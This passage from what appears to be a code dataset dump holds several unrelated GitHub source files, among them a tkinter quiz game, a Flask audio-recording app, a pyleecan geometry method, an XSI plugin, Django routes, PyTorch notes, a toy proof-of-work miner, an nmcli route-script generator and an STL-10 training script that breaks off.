Button\nPhoneAFriend_Button = Button(Top_Frame, image= PhoneAFriend_Image, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80,\n command=PhoneLifeLine)\nPhoneAFriend_Button.grid(row=0, column=2)\n\ncallimage = PhotoImage(file=\"Image Folder/phone.png\")\ncallButton = Button(window, image=callimage, bd=0, bg=\"black\", activebackground=\"black\", cursor='hand2', command=phoneclick)\n\n\n# CENTER PHOTO SETUP\nCenter_Image = PhotoImage(file=\"Image Folder/center.png\")\n\n# Center Label\nCenter_Label = Label(Center_Frame, image = Center_Image, bg=\"black\", width=300, height=200)\nCenter_Label.grid(row=0, column=0)\n\n\n# RIGHT PHOTO SETUP\nAmount_Image = PhotoImage(file=\"Image Folder/Picture0.png\")\nAmount_Image1 = PhotoImage(file=\"Image Folder/Picture1.png\")\nAmount_Image2 = PhotoImage(file=\"Image Folder/Picture2.png\")\nAmount_Image3 = PhotoImage(file=\"Image Folder/Picture3.png\")\nAmount_Image4 = PhotoImage(file=\"Image Folder/Picture4.png\")\nAmount_Image5 = PhotoImage(file=\"Image Folder/Picture5.png\")\nAmount_Image6 = PhotoImage(file=\"Image Folder/Picture6.png\")\nAmount_Image7 = PhotoImage(file=\"Image Folder/Picture7.png\")\nAmount_Image8 = PhotoImage(file=\"Image Folder/Picture8.png\")\nAmount_Image9 = PhotoImage(file=\"Image Folder/Picture9.png\")\nAmount_Image10 = PhotoImage(file=\"Image Folder/Picture10.png\")\nAmount_Image11 = PhotoImage(file=\"Image Folder/Picture11.png\")\nAmount_Image12 = PhotoImage(file=\"Image Folder/Picture12.png\")\nAmount_Image13 = PhotoImage(file=\"Image Folder/Picture13.png\")\nAmount_Image14 = PhotoImage(file=\"Image Folder/Picture14.png\")\nAmount_Image15 = PhotoImage(file=\"Image Folder/Picture15.png\")\n\nAmount_Images = [Amount_Image1, Amount_Image2, Amount_Image3, Amount_Image4, Amount_Image5, Amount_Image6,\n Amount_Image7, Amount_Image8, Amount_Image9, Amount_Image10, Amount_Image11, Amount_Image12,\n Amount_Image13, Amount_Image14, Amount_Image15]\n\n# Right Label\nAmount_Label = Label(Right_Frame, image = Amount_Image, bg=\"black\")\nAmount_Label.grid(row=0, column=0)\n\n\n# BOTTOM PHOTO SETUP\nLayout_Image = PhotoImage(file=\"Image Folder/lay.png\")\n\n# Bottom Label\nLayout_Label = Label(Bottom_Frame, image= Layout_Image, bg=\"black\")\nLayout_Label.grid(row=0, column=0)\n\n\n# QUESTION AREA\nQuestion_Area = Text(Bottom_Frame, font=(\"Arial\", 14, \"bold\"), width=40, height=2, wrap=\"word\", bg=\"black\", fg=\"white\", bd=0)\nQuestion_Area.place(x=70, y=10)\nQuestion_Area.insert(END, my_questions[0])\n\nlabelA = Label(Bottom_Frame, text=\"A:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelA.place(x=60, y=110)\noptionButton1 = Button(Bottom_Frame, text=option1[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton1.place(x=100, y=100)\n\nlabelB = Label(Bottom_Frame, text=\"B:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelB.place(x=330, y=110)\noptionButton2 = Button(Bottom_Frame, text=option2[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton2.place(x=370, y=100)\n\nlabelC = Label(Bottom_Frame, text=\"C:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelC.place(x=60, y=190)\noptionButton3 = Button(Bottom_Frame, text=option3[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, 
activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton3.place(x=100, y=180)\n\nlabelD = Label(Bottom_Frame, text=\"D:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelD.place(x=330, y=190)\noptionButton4 = Button(Bottom_Frame, text=option4[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton4.place(x=370, y=180)\n\n\nprogressbarA = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarB = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarC = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarD = Progressbar(window, orient=VERTICAL, length=120)\n\n\nprogressbarLabelA = Label(window, text=\"A\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelB = Label(window, text=\"B\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelC = Label(window, text=\"C\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelD = Label(window, text=\"D\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\n\n\noptionButton1.bind(\"\", select)\noptionButton2.bind(\"\", select)\noptionButton3.bind(\"\", select)\noptionButton4.bind(\"\", select)\n\n\n\n\nwindow.mainloop()","repo_name":"BiplobDash/Millionaire-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20527219162","text":"from flask import Flask\nimport pyaudio\nimport wave\nimport os\nfrom listener.listener import record_audio\nfrom audio_recognition.audio_recognition import shazam_test\nimport time\nimport asyncio\nimport nest_asyncio\nnest_asyncio.apply()\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Flask app is running'\n\n# This route is accessible at [IP_ADDRESS]:5000/listener_test\n# Functionality\n##### Record for 5 seconds\n##### Output file test_snippet_[timestamp] in the song_snippets_test folder\n@app.route('/listener_test')\ndef listener_test():\n print(\"running listener test\")\n\n snippet_duration = 5 #seconds\n output_folder = 'song_snippets_test'\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # Generate a unique filename for the snippet\n\n ### Get timestring\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n\n ## Create filename\n filename_str = 'test_snippet_'+timestr+'.wav'\n\n ## Join to path\n snippet_filepath = os.path.join(output_folder, filename_str)\n\n print(snippet_filepath)\n \n try:\n status = record_audio(snippet_filepath, snippet_duration)\n print(status)\n except Exception as e: \n print(e)\n\n# This route is accessible at [IP_ADDRESS]:5000/begin_listener\n# Functionality:\n##### Begin recording\n##### Output and save a 5 second snippet every 15 seconds\n@app.route('/begin_listener')\ndef begin_listener():\n\n print(\"beginning listening\")\n\n snippet_duration = 5 #seconds\n interval_duration = 15 #seconds\n total_recording_time = 60 #seconds\n\n # Define output folder\n output_folder = 'song_snippets'\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n \n # start recording loop\n total_loops = int(total_recording_time / interval_duration)\n \n for i in range(total_loops):\n\n # Define filename\n timestr = time.strftime(\"%Y%m%d_%H%M%S\") # Get timestring\n filename_str = 'snippet_'+timestr+'.wav' # Create 
filename\n\n # Join to path\n snippet_filepath = os.path.join(output_folder, filename_str)\n\n try:\n status = record_audio(snippet_filepath, snippet_duration)\n print(status)\n except Exception as e: \n print(e)\n\n time.sleep(interval_duration-snippet_duration)\n\n return \"Snippets complete\"\n\n\n# This route is accessible at [IP_ADDRESS]:5000/test_shazam\n# Functionality:\n##### pick a filename and see if shazam recognizes it\n@app.route('/test_shazam')\nasync def test_shazam():\n filepath = 'song_snippets/test_snippet_20230524_131852.wav' # the breeze - dr dog\n filepath = 'song_snippets/test_snippet_20230524_132647.wav' #random shit\n\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(shazam_test(filepath))\n\n return \"complete\"\n\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"kennygrosz/silent-disco","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2476945254","text":"# -*- coding: utf-8 -*-\nfrom numpy import pi\n\nfrom ....Methods.Machine.LamSlot.build_geometry import build_geometry as build_geo\n\n\ndef build_geometry(self, is_magnet=True, sym=1, alpha=0, delta=0, is_simplified=False):\n \"\"\"Build the geometry of the LamSlotMag\n\n Parameters\n ----------\n self : LamSlotMag\n LamSlotMag object\n is_magnet : bool\n If True build the magnet surfaces\n sym : int\n Symmetry factor (1= full machine, 2= half of the machine...)\n alpha : float\n Angle for rotation [rad]\n delta : complex\n Complex value for translation\n is_simplified: bool\n True to avoid line superposition\n\n Returns\n -------\n surf_list : list\n list of surfaces needed to draw the lamination\n\n \"\"\"\n\n if self.is_stator:\n st = \"Stator\"\n else:\n st = \"Rotor\"\n\n assert (self.slot.Zs % sym) == 0, (\n \"ERROR, Wrong symmetry for \"\n + st\n + \" \"\n + str(self.slot.Zs)\n + \" slots and sym=\"\n + str(sym)\n )\n # getting the LamSlot surface\n surf_list = build_geo(self, sym=sym)\n\n Zs = self.slot.Zs\n slot_pitch = 2 * pi / Zs\n\n # Add the magnet surface(s)\n if is_magnet and self.magnet is not None:\n # for each magnet to draw\n for ii in range(Zs // sym):\n mag_surf = self.slot.get_surface_active(\n alpha=slot_pitch * ii + slot_pitch * 0.5\n )\n # Defining type of magnetization of the magnet\n if self.magnet.type_magnetization == 0:\n type_mag = \"Radial\"\n elif self.magnet.type_magnetization == 1:\n type_mag = \"Parallel\"\n elif self.magnet.type_magnetization == 2:\n type_mag = \"Hallbach\"\n else:\n type_mag = \"\"\n\n surf_list.append(mag_surf)\n # Adapt the label\n if ii % 2 != 0: # South pole\n surf_list[-1].label = (\n \"Magnet\" + st + type_mag + \"_S_R0\" + \"_T0_S\" + str(ii)\n )\n else: # North pole\n surf_list[-1].label = (\n \"Magnet\" + st + type_mag + \"_N_R0\" + \"_T0_S\" + str(ii)\n )\n\n # Apply the transformations\n for surf in surf_list:\n surf.rotate(alpha)\n surf.translate(delta)\n\n return surf_list\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Machine/LamSlotMag/build_geometry.py","file_name":"build_geometry.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12141117264","text":"\"\"\"\nSimple XSI Plugin for hiding a collection of objects. 
You can also hide the\nicon display for the nulls by providing a second boolean value.\n\n>>> Application.zHide(col_objects, True)\n\"\"\"\n\n__version__ = '$Revision: 185 $'\n__author__ = '$Author: andy $'\n__date__ = '$Date: 2009-02-06 21:04 -0800 $'\n\nimport win32com.client\nfrom win32com.client import constants\nfrom win32com.client import constants as c\nfrom win32com.client.dynamic import Dispatch as dispatch\n\nxsi = Application\nlog = xsi.logmessage\n\nnull = None\nfalse = 0\ntrue = 1\n\ndef XSILoadPlugin(in_reg):\n\tin_reg.Author = \"Andy Buecker\"\n\tin_reg.Name = \"zHide\"\n\tin_reg.Email = \"andy@zoogloo.net\"\n\tin_reg.URL = \"\"\n\tin_reg.Major = 1\n\ttry:\n\t\tin_reg.Minor = int(__version__.split(' ')[1])\n\texcept:\n\t\tin_reg.Minor = 0\n\n\tin_reg.RegisterCommand('zHide', 'zHide')\n\t\n\t# copyright message #\n\tmsg = '''\n------------------------------------------\n %s (v.%d.%d)\n Copyright 2008 Zoogloo LLC.\n All rights Reserved.\n------------------------------------------\n\t''' % (in_reg.Name, in_reg.Major, in_reg.Minor)\n\tlog(msg)\n\n\treturn true\n\ndef XSIUnloadPlugin(in_reg):\n\tstrPluginName = in_reg.Name\n\tApplication.LogMessage(str(strPluginName) + str(\" has been unloaded.\"))\n\treturn true\n\n#-----------------------------------------------------------------------------\n# Commands\n#-----------------------------------------------------------------------------\ndef zHide_Init(ctxt):\n\toCmd = ctxt.Source\n\toCmd.Description = \"\"\n\toCmd.SetFlag(c.siNoLogging, True)\n\n\toArgs = oCmd.Arguments\n\toArgs.AddWithHandler('col_object', c.siArgHandlerCollection)\n\toArgs.Add('null_icons', c.siArgumentInput, c.siBool, True)\n\n\treturn True\n\t\ndef zHide_Execute(col_object, null_icons):\n\n\t# step through the collection #\n\tfor item in col_object:\n\t\t\n\t\t# turn off the ogl display #\n\t\titem.Properties('Visibility').Parameters('viewvis').Value = 0\n\t\t\n\t\t# turn ogg the render display #\n\t\titem.Properties('Visibility').Parameters('rendvis').Value = 0\n\t\t\n\t\t# turn off the primary icon #\n\t\tif null_icons and item.Type == 'null':\n\t\t\titem.primary_icon.Value \t= 0\n\t\t\titem.shadow_icon.Value \t= 0\n","repo_name":"nazimba/Zoogloo-Tools","sub_path":"zRigTools/Application/Plugins/zHide.py","file_name":"zHide.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28180137419","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('addform/getq', views.displayques ,name='displayques'),\n path('login/', views.login ,name='login'),\n path('login/checklogin', views.checklogin ,name='checklogin'),\n path('addsub/', views.addsubname ,name='addsubname'),\n path('add/', views.addtodb ,name='add'),\n path('allsubjects/',views.allsubjects,name='allsubjectss'),\n path('editor/',views.editor,name='editor'),\n path('subeditor/',views.subeditor,name='subeditor'),\n path('editquestion/',views.editquestion,name='editquestion'),\n path('editsubject/',views.editsubject,name='editsubject'),\n]","repo_name":"sudheersuri/Xamarin-QuickPrep-Application","sub_path":"questionsapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13600522919","text":"\"\"\"\r\nNormalization\r\n正则化层. 
可以优化网络.\r\n\r\nRecurrent Layers\r\n一些写好的网络结构,\r\n\r\nTransformer Layers\r\n也是一种写好的网络结构\r\n\r\nLinear Layers\r\n线性层\r\n\r\nDropout Layers\r\n nn.Dropout()\r\n 就是在训练的过程中, 随机丢弃一些其中的因素,\r\n 按照p(概率)去丢失. 为了防止过拟合现象\r\nDistance Layers\r\n 就是计算误差\r\nLoss Function:\r\n 就是损失函数.\r\n\r\n\r\n这里主要看线性层:\r\n 其实也就是全连接层 FULL_\r\ntorch.nn.Linear(in_features, out_features, bias=True, device=None, dtype=None)\r\n torch封装的非常好, 只要输入, 和输出以及是否要偏置就可以实现\r\n实际上就是矩阵相乘, 使得最后的结果得到我们想要的形状\r\n因为是矩阵相乘, 所以输入的tensor必须是一个二维的\r\n所以一般再使用Linear之前, 我们一般会使用reshape和view\r\n所以一般是: [barch, ...]然后与矩阵相乘, 根据我们的要求, 得到最终的结果\r\ninput:(*, input)\r\noutput: (*, output)\r\n\r\n\r\nin_features – size of each input sample\r\nout_features – size of each output sample\r\nbias – If set to False, the layer will not learn an additive bias. Default: True\r\n\r\n\r\ntorchvision.models\r\n这里面提供了一些非常经典对于图像方面的网络结构.\r\n别人已经训练好的模型, 你拿过来直接使用就好了.\r\n\r\n \"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision\r\nimport torchvision.transforms as F\r\n\r\nBATCH_SIZE = 64\r\n\r\nclass MyLinear(nn.Module):\r\n def __init__(self):\r\n super(MyLinear, self).__init__()\r\n self.linear = nn.Linear(\r\n in_features=3*32*32,\r\n out_features=10\r\n )\r\n def forward(self, x):\r\n return self.linear(x)\r\n\r\n\r\ndef test01():\r\n # 加载数据集\r\n dataset = torchvision.datasets.CIFAR10(\r\n root=\"./CIFAR10_data\",\r\n train=False,\r\n transform=F.ToTensor(),\r\n\r\n )\r\n # 加载数据加载器\r\n dataloader = DataLoader(\r\n dataset=dataset,\r\n batch_size=BATCH_SIZE,\r\n shuffle=True,\r\n num_workers=4,\r\n drop_last=True,\r\n\r\n )\r\n\r\n for idx, (img, label) in enumerate(dataloader):\r\n print(img.shape)\r\n # 再介绍一个函数:\r\n # img = torch.flatten(img) # 直接摊平.\r\n # print(img.shape)\r\n # torch.flatten()直接摊平,\r\n img = torch.reshape(img, (-1, 3*32*32))\r\n img_out = MyLinear()(img)\r\n print(img_out.shape)\r\n # torch.Size([64, 10])\r\n # 当摊平后:\r\n # torch.Size([10])\r\n break\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n test01()","repo_name":"WakingHours-GitHub/PyTorch","sub_path":"4_土堆torch学习/11_线性层.py","file_name":"11_线性层.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29802785659","text":"from random import choice\nfrom random import randint\nfrom string import ascii_letters\nfrom string import digits\n\nimport hashlib\n\n\ndef mint(challenge, work_factor):\n nonce = 0\n while True:\n nonce_str = str(nonce)\n if verify(challenge, work_factor, nonce_str): # ensure nonce is correct\n return nonce_str\n nonce += 1\n\ndef verify(challenge, work_factor, nonce):\n \"\"\"Checks if nonce starts with sufficient 0's\"\"\"\n\n full_header = challenge + nonce\n h = hashlib.sha256()\n h.update(full_header.encode(\"utf-8\"))\n hash_output = h.hexdigest()\n for i in range(0, work_factor): \n if not hash_output[i] == str(0):\n return False\n return True\n\ndef generate_challenge_string(length=16):\n chars = ascii_letters + digits\n return ''.join([choice(chars) for n in range(length)])\n\n\n\nif __name__ == '__main__':\n\n work_factor = 4\n challenge = generate_challenge_string()\n\n print(\"Challenge: %s\" % challenge)\n print(\"Mining...\")\n\n nonce = mint(challenge, work_factor)\n \n print(\"Nonce: %s\" % 
nonce)\n","repo_name":"stewartfortier/DumbCoin","sub_path":"proof/proof.py","file_name":"proof.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22687560809","text":"# Authors: Mackenzie Hodd, Justin Stewart\r\n# all credit goes to Justin Stewart\r\nimport sys\r\nfile_Location = 'C:\\\\Users\\\\Mackenzie\\\\Documents\\\\test.txt' #Enter your file path here. You'll have to edit the slash direction if you running on linux\r\nnmclicmds = ['nmcli con modify ens192 +ipv4.routes 192.168.1.0/24 172.20.1.1 100','nmcli con modify ens192 +ipv4.routes 192.168.2.0/24 172.20.2.1 100','nmcli con modify ens192 +ipv4.routes 192.168.3.0/24 172.20.3.1 100']\r\nrestartCmds = ['nmcli con down ens192', 'nmcli con up ens192']\r\ncount = 3\r\nnetnum = 0\r\nwhile True:\r\n newstring = 'nmcli con modify ens192 +ipv4.routes 192.168.' + str(count) + '.0/24 172.20.' + str(count) + '.1 100'\r\n nmclicmds.append(newstring)\r\n count = count + 1\r\n if count == 44:\r\n break\r\n\r\nr = open(file_Location, 'w')\r\nfor item in nmclicmds:\r\n newline = item + '\\n'\r\n r.write(newline)\r\nfor cmds in restartCmds:\r\n lines = cmds + '\\n'\r\n r.write(lines)\r\nr.close()\r\n\r\nprint(\"Done\")\r\n","repo_name":"mhodd-ops435/ops535NBB","sub_path":"labs/lab6/vm1_routing.py","file_name":"vm1_routing.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3264765506","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom torchsummary import summary\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nprint('debugger checkpoint')\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\n###\ncuda = True\nseed = 42\nuse_cuda = cuda and torch.cuda.is_available()\n\n# Set seed\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nif use_cuda:\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n# Handel GPU stochasticity\ntorch.backends.cudnn.enabled = use_cuda\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.deterministic = True\n\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n###\noriginal_size = 96\ncropped_size = 64\nnum_channels = 3\nnum_classes = 10\n\n##\n\nmean, std = (0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261)\n\n# transform = transforms.Compose(\n# [transforms.ToTensor(),\n# transforms.Normalize(mean, std)])\n\ntrain_transform=transforms.Compose([\n transforms.Pad(4),\n transforms.RandomCrop(cropped_size),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n\t\t\t\t\t# transforms.RandomRotation(degrees=(0, 20))\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\ntest_transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.CenterCrop(cropped_size),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), ])\n\ntrainset = torchvision.datasets.STL10(root='./ex3/data', split='train', download=True, transform=train_transform)\nvalset = torchvision.datasets.STL10(root='./ex3/data', split='train', download=True, transform=test_transform)\ntargets = trainset.labels\ntargets_idx = np.arange(len(targets))\ntrain_idx, valid_idx = train_test_split(targets_idx, 
test_size=0.2, random_state=seed,shuffle=True, stratify=targets)\ntrain_sampler = torch.utils.data.SubsetRandomSampler(train_idx)\nval_sampler = torch.utils.data.SubsetRandomSampler(valid_idx)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,num_workers=4, sampler=train_sampler)\nvalloader = torch.utils.data.DataLoader(valset, batch_size=16,num_workers=4, sampler=val_sampler)\ntestset = torchvision.datasets.STL10(root='./ex3/data', split='test',download=True, transform=test_transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=16,shuffle=False, num_workers=1)\n\n###\n\nclasses = ('airplane', 'bird', 'car', 'cat', 'deer', 'dog', 'horse', 'monkey', 'ship', 'truck')\n\n###\n\ndef imshow(img):\n img = img / 2 + 0.5 # unnormalize\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n\n# get some random training images\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\n\nimgs_dict = dict(zip(classes, [[],[],[],[],[],[],[],[],[],[]]))\ncounters_dict = dict(zip(classes, [0]*10))\n\nwhile not all(v >= 4 for v in counters_dict.values()):\n images, labels = dataiter.next()\n for image, label in zip(images, labels):\n img_class = classes[label]\n if(counters_dict[img_class] < 4):\n imgs_dict[img_class].append(image)\n counters_dict[img_class] += 1\n\n\n###\n\n# show images\n\n# for l,imgs in imgs_dict.items():\n# print(l)\n# imshow(torchvision.utils.make_grid(imgs, nrow=4))\n\n###\n\n# show an image and its augmented version:\n# we choose to add to our dataloader a horizontal flip, and a random rotation of 20 degrees:\nrotater = transforms.RandomRotation(degrees=(0,30))\nfliper = transforms.RandomHorizontalFlip(p=0.5)\nfliper_for_visualization = transforms.RandomHorizontalFlip(p=1)\nimages,_ = dataiter.next()\nimg = images[0]\n# plt.figure()\n# imshow(img)\nimg_aug = rotater(img)\nimg_aug = fliper_for_visualization(img_aug)\n# plt.figure()\n# imshow(img_aug)\n\n###\ndef train(net, trainloader, valloader, num_epochs=50, validation_ratio=0.2, augment=False):\n\tcriterion = nn.CrossEntropyLoss()\n\t# optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n\toptimizer = optim.Adam(net.parameters(), lr=0.0001)\n\tepoch_pbar = tqdm(range(num_epochs))\n\n\tfor epoch in epoch_pbar: # loop over the dataset multiple times\n\t\trunning_loss = 0.0\n\t\tcorrect_train = 0\n\t\ttotal_train = 0\n\t\tnet.num_epochs += 1\n\t\tcounter = 0\n\t\tfor i, data in enumerate(trainloader, 0):\n\t\t\t# get the inputs; data is a list of [inputs, labels]\n\t\t\tcounter += 1\n\t\t\tinputs, labels = data\n\t\t\tinputs = inputs.to(device)\n\t\t\tlabels = labels.to(device)\n\t\t\t\t#train:\n\n\t\t\ttotal_train += labels.size(0)\n\n\t\t\tif augment: # augmentation\n\t\t\t\tinputs = rotater(inputs)\n\t\t\t\tinputs = fliper(inputs)\n\n\t\t\t# zero the parameter gradients\n\t\t\toptimizer.zero_grad()\n\n\t\t\t# forward + backward + optimize\n\t\t\toutputs = net(inputs)\n\t\t\tloss = criterion(outputs, labels)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\t_, predicted = torch.max(outputs.data, 1)\n\t\t\tcorrect_train += (predicted == labels).sum().item()\n\n\t\t\t# print statistics\n\t\t\trunning_loss += loss.item()\n\t\t\t# if i % 2000 == 1999: # print every 2000 mini-batches\n\t\t\t# \tprint('[%d, %5d] loss: %.3f' %\n\t\t\t# \t\t(epoch + 1, i + 1, running_loss / 2000))\n\t\t\t# \trunning_loss = 0.0\n\n\t\tepoch_loss = running_loss/float(counter)\n\t\ttrain_acc = 
100*correct_train/total_train\n\t\tnet.train_loss_list.append(epoch_loss)\n\t\tnet.train_accuracy.append(train_acc)\n\n\t\t#validation\n\t\tval_los,val_acc = test(net,valloader, print_res=False)\n\t\tnet.val_loss_list.append(val_los)\n\t\tnet.val_accuracy.append(val_acc)\n\t\tepoch_pbar.set_postfix({'epoch': epoch, 'train loss': epoch_loss, 'train_accuracy': train_acc, 'val loss': val_los, 'val_accuracy': val_acc})\n\t\t# epoch_pbar.set_postfix({'epoch': epoch, 'train accuracy': train_acc, 'train loss': train_loss, \\\n # 'val accuracy': val_acc, 'val loss': val_loss})\n\n\tprint('Finished Training')\n\n###\n\ndef test(net, testloader, print_res = True):\n correct = 0\n total = 0\n running_loss = 0\n counter = 0\n criterion = nn.CrossEntropyLoss()\n with torch.no_grad():\n for data in testloader:\n counter += 1\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n outputs = net(images)\n loss = criterion(outputs, labels)\n running_loss += float(loss)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n \n los = running_loss / float(counter)\t\t\n acc = 100 * correct / total\n if print_res:\n\t print(f'Accuracy of the network on the {total} test images: %d %%' % (acc))\n\t\n return los, acc\n\n\n###\n# New Cell Added:\n\ndef show_learning_curve(train_loss_list, val_loss_list, train_accuracy, val_accuracy,\n\t\t\t\t\t\tnum_epochs, title, figsize = (8, 8)):\n\n\tfig, axes = plt.subplots(1, 2, figsize=figsize);\n\taxes[0].set_xlabel('epochs')\n\taxes[0].set_ylabel('loss')\n\taxes[0].plot(range(num_epochs), train_loss_list, label=\"Train\", color='blue')\n\taxes[0].plot(range(num_epochs), val_loss_list, label=\"Validation\", color='red')\n\taxes[0].legend()\n\taxes[0].set_title('Loss vs Epoch')\n\n\n\taxes[1].set_xlabel('epochs')\n\taxes[1].set_ylabel('accuracy') # we already handled the x-label with ax1\n\taxes[1].plot(range(num_epochs), train_accuracy, label=\"Train\", color='blue')\n\taxes[1].plot(range(num_epochs), val_accuracy, label=\"Validation\", color='red')\n\taxes[1].legend()\n\taxes[1].set_title('Accuracy vs Epoch')\n\n\tfig.suptitle(title)\n\n\n\t# fig.suptitle('Logistic Regression:\\n\\n learning rate = {} | batch size = {} | L2 lambda = {}'\n\t# .format(lr, batch_size, l2_lambda))\n\n\t# return fig;\n\n###\nclass LogisticRegression(nn.Module):\n\tdef __init__(self):\n\t\tsuper(LogisticRegression, self).__init__()\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(nn.Linear(\n\t\t\tcropped_size*cropped_size*num_channels, num_classes)).to(device)\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n###\nnet = LogisticRegression()\nshow_learning_curve(*net.history(), title=\"Learning Curves - Logistic Regression\")\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader)\n###\ntest(net, testloader)\n###\nclass FullyConnectedNN(nn.Module):\n\tdef __init__(self):\n\t\tsuper(FullyConnectedNN, self).__init__()\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.Linear(cropped_size*cropped_size*num_channels, 512),\n nn.ReLU(),\n 
